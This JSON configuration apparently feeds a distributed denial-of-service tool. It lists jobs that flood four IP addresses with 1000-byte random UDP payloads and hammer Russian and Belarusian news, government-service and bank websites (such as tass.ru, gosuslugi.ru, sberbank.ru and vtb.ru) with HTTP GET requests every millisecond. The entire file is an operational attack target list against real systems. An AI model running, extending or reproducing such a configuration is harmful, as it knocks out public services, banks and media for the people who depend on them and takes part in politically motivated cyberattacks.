{
  "jobs": [
    {
      "type": "udp",
      "args": {
        "address": "178.248.236.20:53",
        "interval_ms": 1,
        "body": "{{- random_payload 1000 -}}"
      }
    },
    {
      "type": "udp",
      "args": {
        "address": "91.217.20.1",
        "interval_ms": 1,
        "body": "{{- random_payload 1000 -}}"
      }
    },
    {
      "type": "udp",
      "args": {
        "address": "193.232.146.1",
        "interval_ms": 1,
        "body": "{{- random_payload 1000 -}}"
      }
    },
    {
      "type": "udp",
      "args": {
        "address": "91.217.21.1",
        "interval_ms": 1,
        "body": "{{- random_payload 1000 -}}"
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "http://tass.ru/",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.gazeta.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://sputnik.by:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://lenta.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.vesti.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://tvzvezda.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://rkn.gov.ru/:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://ria.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.gosuslugi.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://sberbank.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://vsoloviev.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.1tv.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.rbc.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.gazprombank.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.gazprom.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.vtb.ru:443",
        "interval_ms": 1
      }
    },
    {
      "type": "http",
      "args": {
        "method": "GET",
        "path": "https://www.rt.com:443",
        "interval_ms": 1
      }
    }
  ]
}
